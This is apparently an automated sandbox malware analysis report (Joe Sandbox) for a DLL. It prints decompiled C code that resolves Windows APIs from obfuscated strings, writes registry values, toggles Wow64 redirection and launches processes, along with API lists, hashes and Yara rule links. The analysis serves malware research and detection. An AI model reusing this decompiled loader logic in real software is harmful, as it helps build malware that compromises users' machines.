0x00de52e4
0x00de52e4
0x00de51da
0x00de51e2
0x00de51e7
0x00de51ea
0x00de51ff
0x00de5205
0x00de5206
0x00de5209
0x00de520f
0x00de5212
0x00de5217
0x00de521f
0x00de5226
0x00de522d
0x00de5230
0x00de52c4
0x00de5236
0x00de5236
0x00de523b
0x00de5242
0x00de5256
0x00de525a
0x00de52ab
0x00de525c
0x00de525c
0x00de5263
0x00de526a
0x00de5282
0x00de5288
0x00de528c
0x00de52a6
0x00de528e
0x00de5297
0x00de529c
0x00de529c
0x00de528c
0x00de52bc
0x00de52bc
0x00de5230
0x00de52cb
0x00de52d4
0x00de52d8
0x00000000

APIs

Part of subcall function 00DE4F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00DE51C4,?,?,?,?,00000000,00000000), ref: 00DE4F7F
Part of subcall function 00DE4F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00DE4FA1
Part of subcall function 00DE4F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00DE4FB7
Part of subcall function 00DE4F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00DE4FCD
Part of subcall function 00DE4F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00DE4FE3
Part of subcall function 00DE4F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00DE4FF9

memset.NTDLL ref: 00DE5212

Part of subcall function 00DE6343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00DE522B,73797325), ref: 00DE6354
Part of subcall function 00DE6343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00DE636E

GetModuleHandleA.KERNEL32(4E52454B,03D18D18,73797325), ref: 00DE5249
GetProcAddress.KERNEL32(00000000), ref: 00DE5250
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00DE526A
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00DE5288
CloseHandle.KERNEL32(00000000), ref: 00DE5297
CloseHandle.KERNEL32(?), ref: 00DE529C
GetLastError.KERNEL32 ref: 00DE52A0
HeapFree.KERNEL32(00000000,?), ref: 00DE52BC

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 91923200-0
Opcode ID: f61a44e1e0803f64d5cd458225a66ac592570c8af25953a32409273d8e3cadca
Instruction ID: 438442a2d51d12cf22511deca8cb25691d7ce40d23fdb1170f06399177e8f583
Opcode Fuzzy Hash: f61a44e1e0803f64d5cd458225a66ac592570c8af25953a32409273d8e3cadca
Instruction Fuzzy Hash: 3D316871901659FFCB11BBA5DC88A9EBFB8FF08354F204451E205E7221D375AA41CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 6D482553, Relevance: 12.1, APIs: 8, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 6D48258C
__copytlocinfo_nolock.LIBCMT ref: 6D482604
_wcscmp.LIBCMT ref: 6D48263E
__updatetlocinfoEx_nolock.LIBCMT ref: 6D482667
___removelocaleref.LIBCMT ref: 6D48266D
__updatetlocinfoEx_nolock.LIBCMT ref: 6D48268C

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: Ex_nolock__updatetlocinfo$___removelocaleref__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 875579612-0
Opcode ID: d65328ecf385ae1529ccdad3841e5bcdec68b4d3a52b5fbbd5c193223eb01c03
Instruction ID: ed569045430aa526cc771a9ac2dc7374abe485269fc78e03a2a76c761b2abe17
Opcode Fuzzy Hash: d65328ecf385ae1529ccdad3841e5bcdec68b4d3a52b5fbbd5c193223eb01c03
Instruction Fuzzy Hash: EF41E232909306AFDB20DFA4D880FAD37F0AB04358F21402EEA15A6282DF76DD41DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00DE2902, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00DE295E
SysAllocString.OLEAUT32(0070006F), ref: 00DE2972
SysAllocString.OLEAUT32(00000000), ref: 00DE2984
SysFreeString.OLEAUT32(00000000), ref: 00DE29E8
SysFreeString.OLEAUT32(00000000), ref: 00DE29F7
SysFreeString.OLEAUT32(00000000), ref: 00DE2A02

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 89d6e71ef3b6eaaa77632cd1391ea67ec2c70075e9c5346557e6c12ac3c377a7
Instruction ID: 23f7cc0616f09b1aef8fe603b02df4421e9efcf2028e4d879a5fcf4da1db5111
Opcode Fuzzy Hash: 89d6e71ef3b6eaaa77632cd1391ea67ec2c70075e9c5346557e6c12ac3c377a7
Instruction Fuzzy Hash: A9314F32D00649AFDB01EFB9C845AAFB7BAAF49310F144465ED10EB221DB71AD05CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DE4F5A, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DE4F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00DE6837(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xdea2d4; // 0x2f2d5a8
					_t1 = _t23 + 0xdeb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xdea2d4; // 0x2f2d5a8
					_t2 = _t26 + 0xdeb792; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00DE50CA(_t54);
					} else {
						_t30 =  *0xdea2d4; // 0x2f2d5a8
						_t5 = _t30 + 0xdeb77f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xdea2d4; // 0x2f2d5a8
							_t7 = _t33 + 0xdeb74e; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xdea2d4; // 0x2f2d5a8
								_t9 = _t36 + 0xdeb72e; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xdea2d4; // 0x2f2d5a8
									_t11 = _t39 + 0xdeb7a2; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00DE4248(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00de4f69
0x00de4f6d
0x00de502f
0x00de4f73
0x00de4f73
0x00de4f78
0x00de4f8b
0x00de4f8d
0x00de4f92
0x00de4f9a
0x00de4fa1
0x00de4fa5
0x00de4fa8
0x00de5027
0x00de5028
0x00de4faa
0x00de4faa
0x00de4faf
0x00de4fb7
0x00de4fbb
0x00de4fbe
0x00000000
0x00de4fc0
0x00de4fc0
0x00de4fc5
0x00de4fcd
0x00de4fd1
0x00de4fd4
0x00000000
0x00de4fd6
0x00de4fd6
0x00de4fdb
0x00de4fe3
0x00de4fe7
0x00de4fea
0x00000000
0x00de4fec
0x00de4fec
0x00de4ff1
0x00de4ff9
0x00de4ffd
0x00de5000
0x00000000
0x00de5002
0x00de5008
0x00de500d
0x00de5014
0x00de501b
0x00de501e
0x00000000
0x00de5020
0x00de5023
0x00de5023
0x00de501e
0x00de5000
0x00de4fea
0x00de4fd4
0x00de4fbe
0x00de4fa8
0x00de503d

APIs

Part of subcall function 00DE6837: RtlAllocateHeap.NTDLL(00000000,00000000,00DE4197), ref: 00DE6843

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00DE51C4,?,?,?,?,00000000,00000000), ref: 00DE4F7F
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00DE4FA1
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00DE4FB7
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00DE4FCD
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00DE4FE3
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00DE4FF9

Part of subcall function 00DE4248: memset.NTDLL ref: 00DE42C7

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: d4a16655fd6b365bce58e85991a5a0da0122fbb49c157138ddc454b56f3ced9b
Instruction ID: 9a326ddf5d920e1293eef05607d18b3af5133a630ad167862cbb5c1c47163357
Opcode Fuzzy Hash: d4a16655fd6b365bce58e85991a5a0da0122fbb49c157138ddc454b56f3ced9b
Instruction Fuzzy Hash: 86215EB16007869FD710FF6AEC84E6677ECEB08398B045455F508DB612D336E900CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00DE1D57, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00DE1D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0xdea38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00DE4AA6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E00DE7702(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E00DE50CA(_a8);
						goto L29;
					}
					_t64 =  *0xdea2cc; // 0x3d19c98
					_t16 = _t64 + 0xc; // 0x3d19d8c
					_t65 = E00DE4AA6(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d00de90
						if(E00DE5F2A(_t97,  *_t33, _t91, _a8,  *0xdea384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0xdea2d4; // 0x2f2d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0xdeb9e0; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0xdeb9db; // 0x55434b48
								_t69 = _t34;
							}
							if(E00DE5927(_t69,  *0xdea384,  *0xdea388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0xdea2d4; // 0x2f2d5a8
									_t44 = _t71 + 0xdeb86a; // 0x74666f53
									_t73 = E00DE4AA6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d00de90
										E00DE1F7A( *_t47, _t91, _a8,  *0xdea388, _a24);
										_t49 = _t101 + 0x10; // 0x3d00de90
										E00DE1F7A( *_t49, _t91, _t99,  *0xdea380, _a16);
										E00DE50CA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d00de90
									E00DE1F7A( *_t40, _t91, _a8,  *0xdea388, _a24);
									_t43 = _t101 + 0x10; // 0x3d00de90
									E00DE1F7A( *_t43, _t91, _a8,  *0xdea380, _a16);
								}
								if( *_t101 != 0) {
									E00DE50CA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d00de90
					_t81 = E00DE6A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d00de90
							E00DE5F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00DE50CA(_t100);
						_t98 = _a16;
					}
					E00DE50CA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E00DE77A4(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0xdea38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x00de1d57
0x00de1d60
0x00de1d67
0x00de1d6c
0x00de1dd9
0x00de1ddf
0x00de1de4
0x00de1deb
0x00de1df2
0x00de1df5
0x00de1f60
0x00de1f67
0x00de1f67
0x00de1f6c
0x00de1f6e
0x00de1f6e
0x00de1f77
0x00de1f77
0x00de1dfb
0x00de1e07
0x00de1f56
0x00de1f59
0x00000000
0x00de1f59
0x00de1e0d
0x00de1e12
0x00de1e15
0x00de1e1c
0x00de1e1f
0x00de1e68
0x00de1e68
0x00de1e7b
0x00de1e85
0x00de1e8d
0x00de1e92
0x00de1e9c
0x00de1e9c
0x00de1e94
0x00de1e94
0x00de1e94
0x00de1e94
0x00de1ebe
0x00de1ec6
0x00de1ef4
0x00de1ef9
0x00de1f00
0x00de1f05
0x00de1f09
0x00de1f3b
0x00de1f0b
0x00de1f18
0x00de1f1b
0x00de1f2b
0x00de1f2e
0x00de1f34
0x00de1f34
0x00de1ec8
0x00de1ed5
0x00de1ed8
0x00de1eea
0x00de1eed
0x00de1eed
0x00de1f45
0x00de1f51
0x00de1f47
0x00de1f4a
0x00de1f4a
0x00de1f45
0x00de1ebe
0x00000000
0x00de1e85
0x00de1e2e
0x00de1e31
0x00de1e38
0x00de1e3e
0x00de1e41
0x00de1e43
0x00de1e4f
0x00de1e52
0x00de1e52
0x00de1e58
0x00de1e5d
0x00de1e5d
0x00de1e63
0x00000000
0x00de1e63
0x00de1d71
0x00000000
0x00de1d98
0x00de1d98
0x00de1da4
0x00de1db7
0x00de1dbd
0x00de1dc5
0x00000000
0x00de1dc5

APIs

StrChrA.SHLWAPI(00DE30C2,0000005F,00000000,00000000,00000104), ref: 00DE1D8A
lstrcpy.KERNEL32(?,?), ref: 00DE1DB7

Part of subcall function 00DE4AA6: lstrlen.KERNEL32(?,00000000,03D19C98,745EC740,00DE13D0,03D19E9D,00DE55DE,00DE55DE,?,00DE55DE,?,63699BC3,E8FA7DD7,00000000), ref: 00DE4AAD
Part of subcall function 00DE4AA6: mbstowcs.NTDLL ref: 00DE4AD6
Part of subcall function 00DE4AA6: memset.NTDLL ref: 00DE4AE8

Part of subcall function 00DE1F7A: lstrlenW.KERNEL32(?,?,?,00DE1F20,3D00DE90,80000002,00DE30C2,00DE4106,74666F53,4D4C4B48,00DE4106,?,3D00DE90,80000002,00DE30C2,?), ref: 00DE1F9F

Part of subcall function 00DE50CA: RtlFreeHeap.NTDLL(00000000,00000000,00DE4239,00000000,00000001,?,00000000,?,?,?,00DE6B8D,00000000,?,00000001), ref: 00DE50D6

lstrcpy.KERNEL32(?,00000000), ref: 00DE1DD9

Strings

(, xrefs: 00DE1E3A
\, xrefs: 00DE1DBD

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: bffae93293aad3e7afd1a17afea6853cb7acd666c7c72d582f01bb806e5be3f4
Instruction ID: 07dbf4ac7734dda6f1532f55dc72933db794b25ca0507abf91da1080e6bf11df
Opcode Fuzzy Hash: bffae93293aad3e7afd1a17afea6853cb7acd666c7c72d582f01bb806e5be3f4
Instruction Fuzzy Hash: D4519B3660028AEFCF21BFA6DC81EAA3BB9FF04354F044514FA159A161D731E924DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DE6BE1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00DE6BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00DE2902(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0xdea2d4; // 0x2f2d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0xdeb4c8; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0xdeb8f8; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0xdea100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x00de6be1
0x00de6be8
0x00de6bec
0x00de6bf1
0x00de6bf8
0x00de6bfb
0x00de6c05
0x00de6c0a
0x00de6c16
0x00de6c1d
0x00de6c27
0x00de6c27
0x00de6c1f
0x00de6c1f
0x00de6c1f
0x00de6c1f
0x00de6c2d
0x00de6c30
0x00de6c38
0x00de6c3b
0x00de6c3e
0x00de6c41
0x00de6c46
0x00de6c4f
0x00de6c5c
0x00de6c51
0x00de6c57
0x00de6c57
0x00de6c62
0x00de6c62
0x00de6c6a

APIs

Part of subcall function 00DE2902: SysAllocString.OLEAUT32(?), ref: 00DE295E
Part of subcall function 00DE2902: SysAllocString.OLEAUT32(0070006F), ref: 00DE2972
Part of subcall function 00DE2902: SysAllocString.OLEAUT32(00000000), ref: 00DE2984
Part of subcall function 00DE2902: SysFreeString.OLEAUT32(00000000), ref: 00DE29E8

memset.NTDLL ref: 00DE6C05
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00DE6C41
GetLastError.KERNEL32 ref: 00DE6C51
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00DE6C62

Strings

<, xrefs: 00DE6C16

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: 508f139be83f242792d362af02bc591999a250f5c0edbd8f76d48fdbd9c13891
Instruction ID: 64c4ad76d6d2545c631a38c76b1182bb64c2ec9a27fd9cc9462abd92c17b8247
Opcode Fuzzy Hash: 508f139be83f242792d362af02bc591999a250f5c0edbd8f76d48fdbd9c13891
Instruction Fuzzy Hash: D1115AB1900358ABDB00EFAADC85BAD7FB8EB18790F148016F905EB281D370E544CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00DE2A23, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E00DE2A23(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E00DE6837(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E00DE50CA(_v16);
								goto L37;
							}
							_t103 = E00DE6837((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0xdea2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x00de2a2a
0x00de2a31
0x00de2a36
0x00de2a39
0x00de2a40
0x00de2a43
0x00de2a46
0x00de2a4d
0x00de2a50
0x00de2ba4
0x00de2ba6
0x00de2ba8
0x00de2bad
0x00de2bad
0x00de2a56
0x00de2a59
0x00de2a5c
0x00de2a5e
0x00de2a5e
0x00de2a62
0x00000000
0x00000000
0x00de2a66
0x00de2a92
0x00de2a97
0x00de2a99
0x00de2a99
0x00de2a9c
0x00de2a9f
0x00de2a9f
0x00de2aa1
0x00000000
0x00de2a6c
0x00de2a6e
0x00de2a8d
0x00de2a8d
0x00de2aa4
0x00de2aa4
0x00de2aa5
0x00de2aa5
0x00de2aa8
0x00000000
0x00000000
0x00000000
0x00de2aa8
0x00de2a72
0x00de2ab9
0x00de2abd
0x00de2b97
0x00de2b99
0x00de2b99
0x00de2b9a
0x00de2b9d
0x00000000
0x00de2b9d
0x00de2ad7
0x00de2adb
0x00de2b93
0x00000000
0x00de2b93
0x00de2ae1
0x00de2ae4
0x00de2ae8
0x00de2aee
0x00de2af1
0x00de2b89
0x00de2b89
0x00000000
0x00de2b8f
0x00de2afc
0x00de2b05
0x00de2b19
0x00de2b20
0x00de2b35
0x00de2b3b
0x00de2b43
0x00000000
0x00000000
0x00000000
0x00000000
0x00de2b45
0x00de2b45
0x00de2b45
0x00de2b4c
0x00de2b54
0x00000000
0x00000000
0x00de2b56
0x00de2b5f
0x00000000
0x00000000
0x00000000
0x00de2b61
0x00de2b63
0x00de2b66
0x00de2b66
0x00de2b69
0x00de2b6d
0x00de2b70
0x00de2b76
0x00de2b79
0x00de2b80
0x00000000
0x00de2afc
0x00de2a77
0x00de2a82
0x00de2a85
0x00de2a87
0x00de2a87
0x00de2a8a
0x00de2a8c
0x00000000
0x00de2a8c
0x00de2a66
0x00de2aac
0x00de2ab1
0x00de2ab3
0x00de2ab3
0x00de2ab6
0x00de2ab6
0x00000000

APIs

Part of subcall function 00DE6837: RtlAllocateHeap.NTDLL(00000000,00000000,00DE4197), ref: 00DE6843

lstrcpy.KERNEL32(63699BC4,00000020), ref: 00DE2B20
lstrcat.KERNEL32(63699BC4,00000020), ref: 00DE2B35
lstrcmp.KERNEL32(00000000,63699BC4), ref: 00DE2B4C
lstrlen.KERNEL32(63699BC4), ref: 00DE2B70

Strings

, xrefs: 00DE2AB9

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 66dbc305c204d261be0795ef8ca010389e20481f98eb7d90a13f8b9f27967b1b
Instruction ID: 9c23a3066853541bf60f62e647ba9145f1c84513d4e7d0925f1e90f7ef45be40
Opcode Fuzzy Hash: 66dbc305c204d261be0795ef8ca010389e20481f98eb7d90a13f8b9f27967b1b
Instruction Fuzzy Hash: 8751D671900248EFDF21EF9AC8846FDBBB9FF45314F198066E8599B255C770DA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D47F6B9, Relevance: 7.5, APIs: 5, Instructions: 45threadCOMMON

